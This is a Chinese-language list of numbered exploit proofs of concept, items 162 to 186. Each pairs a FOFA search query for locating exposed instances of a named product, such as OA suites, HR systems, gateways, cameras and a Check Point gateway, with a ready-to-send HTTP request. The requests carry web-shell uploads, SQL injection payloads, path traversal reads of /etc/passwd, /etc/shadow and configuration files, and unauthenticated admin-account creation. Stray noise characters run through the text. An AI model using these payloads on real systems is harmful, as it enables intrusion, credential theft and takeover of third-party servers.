" n+ W0 @0 P$ s* _* p( c- c: z% s9 |7 J r3 o5 E
http://x.x.x.x/dizxdell.aspx
7 \5 y$ l6 n+ f4 O2 N5 i) l3 W
6 I/ [& {" B. [- l& f% t" ]162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传5 H1 o9 L$ b7 y; F
FOFA: app="和丰山海-数字标牌"
. e& |; ?* |) H: g% ePOST /QH.aspx HTTP/1.1
6 I$ B$ u6 j V+ I; PHost: x.x.x.x
8 N/ ` k8 x- h4 \& N- aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
! g8 ~9 y" G& [6 e6 M ]( SConnection: close
3 z* f0 V/ u+ U7 \' a7 S5 LContent-Length: 583
0 k* Y/ c4 [9 R" I" U; kContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey9 L8 }7 C: e. m; c
Accept-Encoding: gzip6 v# A1 T) Y) Q2 e
3 M {. _5 |( G2 L: N+ S' T4 q
------WebKitFormBoundaryeegvclmyurlotuey. ~7 H2 h( H* B) {) f
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
( U$ o* U) y4 p( a8 V& G4 p: w7 MContent-Type: application/octet-stream: f- c( F$ Z" i. g v% J
: ]) Z4 ~. J X<% response.write("ujidwqfuuqjalgkvrpqy") %> T/ v! F4 V$ x! o. X6 S) v
------WebKitFormBoundaryeegvclmyurlotuey1 Z! u* h. n! B1 T+ `0 |/ p
Content-Disposition: form-data; name="action"
, w/ p& q- k4 L& i
+ y9 w; b% ^1 b& e7 g5 Aupload+ x8 ~1 X5 D% _/ i2 K6 @, z3 F
------WebKitFormBoundaryeegvclmyurlotuey1 V6 D. w0 L4 H( [
Content-Disposition: form-data; name="responderId", d9 D1 Z9 W1 _5 r$ o
5 u8 S2 C7 V+ ^- H7 M
ResourceNewResponder
" g2 I7 S& c& [------WebKitFormBoundaryeegvclmyurlotuey
8 ~& H3 c% u' b! U9 x/ LContent-Disposition: form-data; name="remotePath"# }, p0 c3 P" d2 Z
) v( }# |0 ^' }/ @! |
/opt/resources
. V8 w3 r, w& I- c- D------WebKitFormBoundaryeegvclmyurlotuey--
3 K6 g" D, }6 e0 z$ g" X4 q( O
" K' H% S& A! k, A) f. X; F- n8 ^& l: P6 {0 j
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
6 I; k1 @( J. H2 b
& y. `: w# y3 Z& B/ x9 N163. 号卡极团分销管理系统 ue_serve.php 任意文件上传 N0 c3 Y+ L; _& [, T
FOFA: icon_hash="-795291075"3 _$ {( t" \7 K4 I V2 D
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
" v# w# e. T( S/ ~9 A% VHost: x.x.x.x5 m, ?6 _" g8 K3 j8 n3 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36* N! m$ L, z) ]# k6 c( c+ _
Connection: close
) l) {6 C3 E& V6 `; Z* dContent-Length: 2939 m# Z# v- m; S4 u- T) s
Accept: */*: f% u2 L: F q
Accept-Encoding: gzip, deflate9 b/ |8 y) X, Y! ?8 }
Accept-Language: zh-CN,zh;q=0.9
9 c" e8 \1 W1 D$ w' @ _Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod# `9 c- n( z9 s, D) b$ r/ ~" l
$ \5 L( s3 _1 `1 |9 k* y------iiqvnofupvhdyrcoqyuujyetjvqgocod
3 ~ F) Z* E* \9 aContent-Disposition: form-data; name="name"
( X# I3 ]7 h9 q% T
# ?# r4 x( M K% t1.php
5 v' Q0 q4 a0 v------iiqvnofupvhdyrcoqyuujyetjvqgocod
2 ]( V8 }3 }# W* c4 nContent-Disposition: form-data; name="upfile"; filename="1.php"8 E, N) \) m' ]+ P) D! Z8 G" _
Content-Type: image/jpeg
7 S7 ^- L" e( U5 t, v3 y, m0 E6 V6 q. I }% n# d# K) m9 m T
rvjhvbhwwuooyiioxega
4 {( y( X, A1 v1 {4 R' S------iiqvnofupvhdyrcoqyuujyetjvqgocod--' ^& i% [) J- h: ]
3 N( I9 r; N( T
; f4 m# a! j$ [+ c+ _$ ]164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传/ Y# G" J. u$ C$ X" f. h9 g4 X
FOFA: title="智慧综合管理平台登入". @, U) R Y: h. r5 X, ~: c! h
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.17 L* E' }, N. d, A/ ^- U( S3 S
Host: x.x.x.x* ^# r: }4 ^: V- S2 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
9 b, h' v: f; h- mContent-Length: 288% m2 r- V1 V6 `' L, e2 T
Accept: application/json, text/javascript, */*; q=0.01* e* J* V$ ^8 ^7 n( @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,. n% k: L1 \5 n4 ?
Connection: close& H& o6 i' N7 j+ j$ ~
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl J" k3 I S x/ j
X-Requested-With: XMLHttpRequest7 F% Q3 B6 @ U5 e( R$ B" j- Z; ~
Accept-Encoding: gzip1 V% u2 i" K9 A
1 v% c& s) e; R) @& a5 k# p
------dqdaieopnozbkapjacdbdthlvtlyl
8 e$ B% j; G: s1 p! AContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
: s+ J- T m2 c x" jContent-Type: image/jpeg8 J5 ?3 _$ T1 V3 Y% [) K3 W
0 }0 D& P9 k( P; H, {<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
0 X! }8 l& N3 R' S% |" R) q------dqdaieopnozbkapjacdbdthlvtlyl--
* d7 k! n' Z" {, ~
B3 L+ J% ?# x2 }7 @2 V* L8 B: Y N
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx1 t* C! U) B2 B2 v* @( g4 A& j
; w5 m0 D- W I0 n) x1 c5 W7 r165. OrangeHRM 3.3.3 SQL 注入! S* M% K: T" m/ ?# a) @; y$ [4 _/ T
CVE-2024-36428
2 u7 P8 N- a+ [FOFA: app="OrangeHRM-产品"8 B7 d K) p& Z2 _' B
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
$ \; x- n; x$ Q$ o# d- U; m, j" t, X8 C3 @3 [6 n
" X% b! s0 g! I/ |. l( j! t( S% c
166. 中成科信票务管理平台SeatMapHandler SQL注入1 W; U) F6 Y# ^, g8 C$ G7 \' z
FOFA:body="技术支持:北京中成科信科技发展有限公司"
. m: X2 b3 P. Y5 w8 pPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.17 N$ a) D5 j; z, S3 |- d& w/ f3 D
Host:
0 {5 I+ g6 R( i1 @+ b# t. P) cPragma: no-cache' q5 r# f: u8 ?: l
Cache-Control: no-cache0 B$ Z+ b) U+ ~, f
Upgrade-Insecure-Requests: 17 w4 H! e+ l/ c5 o! N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
/ m# ?) N) ]7 C7 ^9 ^ b% O+ qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ q+ r2 E. ~# g, z" ]( QAccept-Encoding: gzip, deflate
* @9 j/ N8 s' D" JAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
3 T2 K4 R5 R* o% y/ }7 B) GCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE# x! Z) B, ?* K. d3 x+ i
Connection: close
6 h# `( t7 K; a D- D$ j3 I0 lContent-Type: application/x-www-form-urlencoded
v: F7 l+ z& S( P4 K& C0 [Content-Length: 89
+ ?9 s' q) b {8 ` ^) w
9 B1 j- v' M- Q- ~+ G2 pMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
' d# ], ]( B( K2 S" i# h# j
$ q" i1 u. I" \) t6 j. l& z; S- [# d
167. 精益价值管理系统 DownLoad.aspx任意文件读取
; b; A3 F4 `* H; LFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"" q! t& G. j. l2 j% c0 N* T' F
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1& j2 J6 y# R: l, x; n
Host:/ z5 A+ N6 \+ L3 B; J* B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- ^: i# a: G) W" UContent-Type: application/x-www-form-urlencoded
) G f4 G+ X+ Q) R$ M1 n7 [/ q, B" rAccept-Encoding: gzip, deflate
1 ?* G7 I( x/ @; B2 [$ eAccept: */*( C* e, ^" W& A% a% z. e; [
Connection: keep-alive* O5 x# K/ D# f/ F D3 I4 O% i4 y2 _
. V8 |) m% f5 O
8 ?/ j4 q5 q1 ^& A168. 宏景EHR OutputCode 任意文件读取9 ~& G8 ?! N- R7 j* O
FOFA:app="HJSOFT-HCM") K X+ g; n- V* u) g' {* R! z- a( ~, R
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
3 h; j+ { c! v+ h) k* \% PHost: your-ip
6 H* u$ X& F+ DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
. {3 I) } m) \& f4 w; h! \Content-Type: application/x-www-form-urlencoded
5 h _) z( j- M7 X9 j8 l$ y: ?Connection: close' a& b8 X7 _% G2 a, c X" ?
- S4 n: f5 v8 p) K
: T( y* A" g& D* Z2 H) f7 _/ L# t% ~6 l
169. 宏景EHR downlawbase SQL注入
; [, j" F8 J- I+ f' W4 YFOFA:app="HJSOFT-HCM"
3 `& d D. t( b3 Y- _* ^1 v2 M+ CGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1! L, p9 L' r3 w8 O; M; l
Host: your-ip
5 s7 V& u& m5 E; S3 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 A2 G* `) Z5 A) e3 b% lAccept: */*
; x2 V# D# ]* A. v8 BAccept-Encoding: gzip, deflate
+ n0 J5 h/ m r- f. FConnection: close
8 `( d/ h c) o" ^/ U8 r) r4 k/ x; D A
7 \6 x# }1 Z' n5 H7 ?; M5 c2 n
$ ^+ ^- X) D* ^" L+ W' m0 @& J0 [170. 宏景EHR DisplayExcelCustomReport 任意文件读取
0 M. G: L, J7 N* u* b5 EFOFA:body="/general/sys/hjaxmanage.js"
7 V6 u$ r7 y* @6 ]% X/ hPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
1 O$ R9 m0 ~+ O3 a8 J* u6 z4 m% aHost: balalanengliang
) b7 I6 V+ [- K2 v, j8 _2 aUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 a0 U- |& V. B" O( K) _
Content-Type: application/x-www-form-urlencoded
8 z/ D: D+ Z6 f ?% K. Q
, o& U. _* ~/ `3 A% k) Nfilename=../webapps/ROOT/WEB-INF/web.xml
* X7 H+ r& m2 u/ F; X
+ v) }2 L2 T! q' P ]7 Z' a8 b5 c5 _ R+ s9 Q
171. 通天星CMSV6车载定位监控平台 SQL注入
8 O& @" Z# O4 d5 u# m, _* GFOFA:body="/808gps/"
& ]) X1 R, o" \4 Z8 zGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
3 Z9 F0 U2 ^1 ~+ _2 s" z& nHost: your-ip
/ D) Q6 a# h5 }( U& I8 J2 eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.01 f( p; i1 g4 [) Y# s
Accept: */*9 v/ J( r, ?' [; V( p& h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 _ g' t. _! a8 O; n; D
Accept-Encoding: gzip, deflate: E% s( ^6 w5 J) Q+ N6 r% A
Connection: close
2 U7 G5 e' r8 M- T
5 l7 F0 g; t, @% N- D/ I2 C" X( N L5 G& z
9 w3 o, j( o% q' b172. DT-高清车牌识别摄像机任意文件读取
% w- ^% W7 t4 z+ lFOFA:app="DT-高清车牌识别摄像机"
" e% g1 x6 K. j+ y1 aGET /../../../../etc/passwd HTTP/1.1
$ L& D' Z7 q( Z5 H" VHost: your-ip$ ^$ n# o( Y' X6 x3 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, F5 V2 v2 }5 ]/ w9 C
Accept-Encoding: gzip, deflate% M" e5 ~4 ?' [8 `5 ~ E/ b j$ |
Accept: */** P$ q$ K% @3 {, p5 J
Connection: keep-alive7 O" E4 i4 C; t* N8 e$ F- \ V
" Y9 i( E) e" m4 T
, ~: ]: \& X* L# z5 G- [2 r
7 A" y) f, E/ d173. Check Point 安全网关任意文件读取# n9 B, V7 Y- h' H
CVE-2024-24919
# e3 c9 ~4 k6 h+ W p/ Q VFOFA:app="Check_Point-SSL-Network-Extender"
7 ^9 @3 w- O7 g8 ~/ D1 ^7 APOST /clients/MyCRL HTTP/1.1
* V- i3 S8 A$ o0 N# PHost: your-ip
) i- \+ ?- Q( [; yContent-Type: application/x-www-form-urlencoded
$ k; _# ~) Z& C. G+ _& j/ b& x* m) |# H
aCSHELL/../../../../../../../etc/shadow; N9 Y0 j6 }. `% W* n( ~5 v: I
7 `& R. p& p! F; M: ^, \, \' M! Q' Q+ d( c) D8 Q% N
1 X1 b" w- y7 s' i9 l0 w174. 金和OA C6 FileDownLoad.aspx 任意文件读取( g t7 v! k& O. v3 n
FOFA:app="金和网络-金和OA"
# B% M: x" G, C, vGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
' F$ n; N7 f) v% {6 D W6 l6 `3 aHost: your-ip& E) t3 ^9 R0 i" i: p7 K0 K0 i1 r e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.364 i8 y: Y4 O: P+ F4 u1 k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) F8 N0 d0 b; z. y/ f
Accept-Encoding: gzip, deflate, br; `- E, B; c! `+ P: Y/ S. y
Accept-Language: zh-CN,zh;q=0.9- V: T# X( F% [4 u: B
Connection: close% d1 Y5 f$ J% X( ?. U
* ]. O- e$ v8 W' `
- w8 J8 b% `. C* A) a, v4 v% R! w7 Z, i5 d* c4 a
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
6 ^$ t+ p( a( v- RFOFA:app="金和网络-金和OA"8 i% y5 I; Y9 `% N; r
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1* m% K$ }! d2 q$ Q6 u' U3 b2 n7 d
Host:
- M. ^( g3 _4 l& [/ i/ P- YUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ l* j# Z2 g4 V) G3 K: E! T( HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% V& t" H: E* W: Q2 c- v1 v. y. S1 H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, v! ~7 E: j- d; _# G2 q0 _
Accept-Encoding: gzip, deflate. J. F1 p2 M# E
Connection: close
( F& }) j' z. U. o9 ]# J" D8 EUpgrade-Insecure-Requests: 18 F. ` h" @( l2 D. v: }& e# u, D
9 y9 ^. m9 I+ t0 Q' A1 P; E7 o
& Z& q: e& l' ^2 R* U
176. 电信网关配置管理系统 rewrite.php 文件上传
0 [- y# d$ g+ \3 T: cFOFA:body="img/login_bg3.png" && body="系统登录"3 i* J t2 b0 o+ u7 S$ y
POST /manager/teletext/material/rewrite.php HTTP/1.1
" N! E4 j! g5 x5 rHost: your-ip
4 a/ E9 e0 b) O' p3 K/ Q9 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0# M" b7 c5 b) H) m! @
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
; M2 O. P2 Z" o. x. f0 i" z" AConnection: close! `8 o3 r: k* `6 O9 A
. @! f( r$ n, o6 j; \, x5 o3 v2 M
------WebKitFormBoundaryOKldnDPT
* B" U7 C4 [ a9 F, a2 oContent-Disposition: form-data; name="tmp_name"; filename="test.php"
& U( R4 L# A% w) _# C( |$ HContent-Type: image/png
8 z; s. k# p$ b$ q y( R ! i0 p6 _) R ]
<?php system("cat /etc/passwd");unlink(__FILE__);?>
" q6 m! Y0 C3 [6 @* d3 R0 l------WebKitFormBoundaryOKldnDPT3 n$ y6 t& B) e s0 J' H
Content-Disposition: form-data; name="uploadtime"
1 G. R7 {# F: K/ j2 R) W2 H8 ?
- J9 H6 K2 }0 K$ P3 [% a/ ~2 _2 l
$ N0 |) c& N5 Y% B4 n& h------WebKitFormBoundaryOKldnDPT--5 k; b8 p. M# y. f
; f, i& e, m7 L8 J" U
Q$ G/ Z8 }- B
+ g* O& m6 L- |: \0 t8 t& `* t177. H3C路由器敏感信息泄露: P& K6 U+ E3 P t4 G, n
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg3 ^4 `/ A% A! n$ f. }! D
/userLogin.asp/../actionpolicy_status/../M60.cfg
: Z! H0 [7 A+ C: ?) |/ H7 g/ \/userLogin.asp/../actionpolicy_status/../GR8300.cfg; ]& k& d- ?) W( p& T+ e% z+ r7 s
/userLogin.asp/../actionpolicy_status/../GR5200.cfg8 v2 u, t$ x; e% I" x
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
# P- ]* ?) P, e7 {2 \/userLogin.asp/../actionpolicy_status/../GR2200.cfg
- [% L1 O( u7 H# p: ?4 @) Q/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg6 [) j! @1 b. j9 m
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg8 R/ {, z+ ]; e# Z
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg6 C( [- ]' k% c( F! T6 t
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg0 I' G. w V& f6 _- N4 [ F4 j
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
5 _; @+ @) D9 K. p3 i& q( _9 u/userLogin.asp/../actionpolicy_status/../ER5100.cfg/ p7 t( j- x6 B% c4 Y
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
9 O) _' k m' m( t$ N0 W/userLogin.asp/../actionpolicy_status/../ER3260.cfg
) L" X: r+ e/ M; w6 J2 K/ u' v/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg. I0 {# W+ x. Z7 c5 q
/userLogin.asp/../actionpolicy_status/../ER3200.cfg. x) F* O6 V5 m# `
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg2 D, }9 a, S2 G9 v5 O
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
& s# Z* s6 k8 |0 ^/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/ D' g( s8 m+ a/userLogin.asp/../actionpolicy_status/../ER3100.cfg
& ?! r& G# C, ~+ Q6 T/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
: l& C" o! H0 n$ v/ ?( W' m2 v! a% ?1 S
0 q2 u* U4 ~6 R6 r1 G' X
178. H3C校园网自助服务系统-flexfileupload-任意文件上传( f# w, k2 X; O( N6 l( @
FOFA:header="/selfservice"
/ r( K- o! \7 ~* V$ [2 ~, uPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1! n9 q4 {5 n) j$ J
Host:/ q( h: R3 Q! R0 A6 e" [' @+ z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
3 F. P' i+ q' u7 ~/ T KContent-Length: 252
' f* A! B* B6 x, nAccept-Encoding: gzip, deflate
! E3 j& D% n7 h3 ?7 V& lConnection: close1 X5 g3 D! _! X
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
! M3 ^; u$ q7 S- G% {9 R6 s- ]7 a-----------------aqutkea7vvanpqy3rh2l/ E0 D7 o+ q' G2 a4 A
Content-Disposition: form-data; name="12234.txt"; filename="12234"
# f7 P% @# l9 zContent-Type: application/octet-stream
( w/ S9 w& ~+ h3 w) i fContent-Length: 2559 T4 C6 T$ E+ @% h" @# Q
6 ^( R2 h6 F$ Y+ T# f
12234( g& i1 m- F- b! i
-----------------aqutkea7vvanpqy3rh2l--
% n0 y) X' D' W6 O! Q" `% S
) f! j, S$ N! d& \- R
# ?" R! \7 P7 S- E3 \GET /imc/primepush/%2e%2e/flex/12234.txt& a1 ?: ]& @, P" O) t: W7 w
$ E% j) O- e5 [# j$ _7 m7 b1 a% s
5 e. B" w; q$ \* W; J179. 建文工程管理系统存在任意文件读取
$ Q3 I% c4 j! QPOST /Common/DownLoad2.aspx HTTP/1.1
4 ~4 B, H8 }6 |$ ]! HHost: {{Hostname}}
! n5 ~, l$ D- D* a+ JContent-Type: application/x-www-form-urlencoded4 v+ U5 x' X, n/ I
User-Agent: Mozilla/5.0
l {' j6 c& d. j
) X3 M2 _. V' hpath=../log4net.config&Name=
, F$ r8 `6 e: |4 V* P/ ]
! c+ l4 @& i" V1 I9 A7 U z& n# `+ \0 P: J# p4 }" G7 Z
180. 帮管客 CRM jiliyu SQL注入
0 ]8 R4 b5 b5 K* h; A, b8 cFOFA:app="帮管客-CRM"
: d" G% T$ ^6 d) iGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1! c) B# V1 L9 s0 X* n; i, ]
Host: your-ip
/ D' G9 ]3 |5 A5 `; Z% n' ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36) l5 P% e7 @. E' ]' o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ `: t) G$ q" H8 k8 }Accept-Encoding: gzip, deflate
( h% z5 q) S! q$ yAccept-Language: zh-CN,zh;q=0.94 M/ g/ c5 i, [) Q) Z: q
Connection: close
) ^2 N7 p6 t4 ]/ z4 r' p
3 k7 N. S9 i0 W% u) x7 J" o4 Q0 H* U' [
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入, ]7 B1 J) T- C
FOFA:"PDCA/js/_publicCom.js"
" x( a0 u/ I0 M! d. jPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.10 D/ A9 I9 |3 ^
Host: your-ip
: c [) z# S" r$ Q5 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
# D6 N4 ^; D8 f) V1 KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 i. {6 F) q6 J, h* w ZAccept-Encoding: gzip, deflate, br1 X% q! |. h/ r- O. Y7 E4 U: n8 f
Accept-Language: zh-CN,zh;q=0.9& C1 S+ A) ?" ]/ t4 E
Connection: close7 t( ?: G: E8 o+ L1 s/ X
Content-Type: application/x-www-form-urlencoded
, h" W2 l/ R2 [! n$ B) d
4 u' ^" F# M9 b) h) o6 i. r$ H9 m" e5 a1 k% T
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
+ ?% t5 w. _+ W5 R; e8 U' ^6 M7 E% Q) y, C. o! I- \
* ^0 v* Q" L |182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
. Y! W: S/ y) n5 gFOFA:"PDCA/js/_publicCom.js"
' `* d8 [( H! Y' ]( N( PPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1- E: i% f2 D9 _
Host: your-ip& J# l! g. `/ p( y! F" O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
/ e. t+ T: j! D( O, |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 I' K6 R0 z" A8 oAccept-Encoding: gzip, deflate, br: e7 @ Z' D' w- d- E6 s
Accept-Language: zh-CN,zh;q=0.9# r. V* _: o( X- [8 V- s
Connection: close$ E! u# D; g2 M h2 c9 B
Content-Type: application/x-www-form-urlencoded4 F3 d7 H9 V: a4 g1 ]- {; M F7 t" N
+ a3 z5 |: ?0 O! Q- d% X) n5 S4 l( w
username=test1234&pwd=test1234&savedays=1$ P$ V( I1 }7 b) `
2 F+ e4 g& M8 h% ?4 N$ s$ r
, o6 i, \. Y2 j, ?183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入+ K1 _" u0 ]8 V
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"& p6 e8 G$ ?& C( X6 x S
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
5 ^) k2 b7 c" ^! _! \Host: your-ip
7 ]8 j* a1 ]1 {% }0 H0 h( wUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
* Z5 e$ o% I4 @% Z# e7 U, QAccept-Charset: utf-8- ~$ U7 Y7 t: t; S
Accept-Encoding: gzip, deflate2 \1 c+ H/ B9 ]7 [$ e7 t+ f+ e
Connection: close
+ U( ]3 [: `5 Z. W. H, F8 q
1 s: i, T1 R) d4 X# f4 A. {
4 r/ T! Z# X% O) Y, I! g184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
& b: V( w% o* Y ?/ B4 b/ jFOFA:server="SunFull-Webs"
% T- b! }# L- l) y JPOST /soap/AddUser HTTP/1.1+ m* V! B; A$ A" N- ^" t
Host: your-ip
# W% x: n- z/ }+ h {Accept-Encoding: gzip, deflate
5 s E/ F: L2 f+ g5 Y# XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0# P2 u8 K5 ^3 a A- d6 E* R$ ~8 d0 V/ _
Accept: application/xml, text/xml, */*; q=0.01: ^9 J( V/ p3 ^4 g& S/ ]
Content-Type: text/xml; charset=utf-8
1 j( a. d7 z9 J" l& {6 C, KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) c% t5 Y+ j2 q+ t5 m
X-Requested-With: XMLHttpRequest
. _9 K4 w7 F' X8 ^7 o1 ^
- F1 X7 v- c! y5 v. M k4 G2 @$ D$ A' U# t' v
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')& {7 i% I) a, q4 X7 O+ u
! B8 ]% k) q$ s, C; a" q8 i* ~
* d9 Q+ |9 B6 Q185. 瑞友天翼应用虚拟化系统SQL注入/ ]6 |- \+ U+ |- O/ P
version < 7.0.5.11 u; |: u8 f3 @& u' J: n
FOFA:app="REALOR-天翼应用虚拟化系统"
" ~+ v- Z0 p1 f5 d1 AGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.19 ^; L, C8 z, C- r+ i
Host: host4 j2 m* n+ D; H6 v% H) J, \
3 w6 a8 b! @# h' [2 W( P
; m. B* y- I P: {186. F-logic DataCube3 SQL注入
! n6 z. |% Q9 tCVE-2024-31750: r ^8 Y; L- M
